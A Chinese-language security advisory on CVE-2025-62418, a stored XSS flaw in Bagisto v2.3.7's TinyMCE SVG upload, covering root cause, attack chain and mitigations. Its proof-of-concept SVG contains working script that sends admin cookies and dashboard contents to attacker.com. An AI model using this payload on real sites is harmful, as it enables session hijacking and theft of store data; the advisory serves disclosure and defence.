CVE-2025-62418 Bagisto存储型XSS漏洞（SVG上传）

漏洞信息

漏洞编号

CVE-2025-62418

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Bagisto（基于Laravel的开源电商平台）

漏洞概述

CVE-2025-62418是Bagisto电商平台v2.3.7版本中存在的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞位于平台的TinyMCE富文本编辑器图片上传功能中，允许具有足够权限的攻击者（例如管理员）上传包含恶意JavaScript代码的特制SVG文件。当其他管理员或用户查看该恶意文件时，嵌入的脚本代码将在受害者浏览器的上下文中执行，从而窃取会话凭证、进行权限提升或执行其他恶意操作。

该漏洞的CVSS 3.1评分为6.9分，属于中危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H）才能触发上传操作，同时需要用户交互（UI:R）来查看恶意内容。由于影响范围发生变化（S:C），机密性影响为高（C:H），完整性影响为低（I:L），可用性影响为无（A:N）。

该漏洞由GitHub安全顾问团队（[email protected]）发现并报告，并于2025年10月16日正式披露。Bagisto官方已在v2.3.8版本中修复了该安全问题，建议所有使用受影响版本的用户尽快升级到最新版本以消除风险。

技术细节

该漏洞的根本原因在于Bagisto v2.3.7的TinyMCE富文本编辑器在处理图片上传功能时，未对上传的文件类型进行严格的MIME类型验证和内容过滤，特别是允许上传SVG（可缩放矢量图形）格式的文件。

SVG文件本质上是一种基于XML的图像格式，支持嵌入JavaScript脚本和事件处理器（如onload、onclick等）。当攻击者上传一个包含恶意JavaScript代码的SVG文件时，该文件会被存储在服务器上。由于浏览器在渲染SVG文件时会执行其中嵌入的脚本，因此当其他用户（尤其是管理员）通过浏览器查看该SVG图像时，恶意代码将在其浏览器上下文中执行。

利用方式如下：
1. 攻击者首先需要获取具有图片上传权限的账户（通常是管理员账户）。
2. 创建一个包含恶意JavaScript的SVG文件，例如使用`<script>`标签或事件处理器。
3. 通过TinyMCE编辑器将该SVG文件上传到Bagisto平台。
4. 当其他管理员或用户查看包含该SVG的页面时，恶意脚本自动执行。
5. 攻击者可通过窃取的会话凭证执行权限提升、数据窃取等进一步攻击。

该漏洞的修复方法是：在文件上传验证中添加SVG文件的MIME类型黑名单，或者对SVG文件内容进行严格的过滤，禁止其中包含`<script>`标签和事件处理器属性。Bagisto v2.3.8版本已实施相应的安全修复措施。

攻击链分析

STEP 1

步骤1：获取权限

攻击者通过钓鱼、社会工程或其他方式获取Bagisto平台具有图片上传权限的账户凭证，通常是管理员账户。

STEP 2

步骤2：制作恶意SVG

攻击者创建一个包含恶意JavaScript代码的SVG文件，代码可执行会话窃取、数据外泄或权限提升等操作。

STEP 3

步骤3：上传恶意文件

通过TinyMCE富文本编辑器的图片上传功能，将恶意SVG文件上传到Bagisto平台，文件被存储在服务器上。

STEP 4

步骤4：触发执行

当其他管理员或用户通过浏览器查看包含该SVG图像的页面时，恶意JavaScript代码自动在受害者浏览器上下文中执行。

STEP 5

步骤5：数据窃取与权限提升

恶意脚本窃取受害者的会话Cookie、CSRF令牌等敏感信息，攻击者可利用这些信息冒充受害者执行进一步攻击，如修改商品价格、窃取用户数据等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62418 PoC: Malicious SVG with embedded JavaScript -->
<!-- Upload this file via Bagisto's TinyMCE image upload functionality -->
<!-- When viewed by an admin/user, the script executes in their browser context -->

<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <script type="text/javascript">
        // Steal session cookies or perform privileged actions
        var img = new Image();
        img.src = "https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie);
        
        // Exfiltrate admin page content
        var xhr = new XMLHttpRequest();
        xhr.open("GET", "/admin/dashboard", true);
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4) {
                var exfil = new Image();
                exfil.src = "https://attacker.com/exfil?data=" + encodeURIComponent(xhr.responseText);
            }
        };
        xhr.send();
    </script>
    <rect x="0" y="0" width="200" height="200" fill="#ffffff"/>
    <text x="50" y="100" font-family="Arial" font-size="16" fill="#000000">Image</text>
</svg>

影响范围

Bagisto < 2.3.8

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web服务器层面阻止SVG文件的直接访问或将其Content-Type设置为纯文本；2）通过WAF规则拦截包含<script>标签的SVG文件上传；3）限制只有可信的管理员账户才能使用图片上传功能；4）启用严格的内容安全策略（CSP）头，阻止内联脚本执行；5）监控异常的文件上传行为和可疑的网络请求。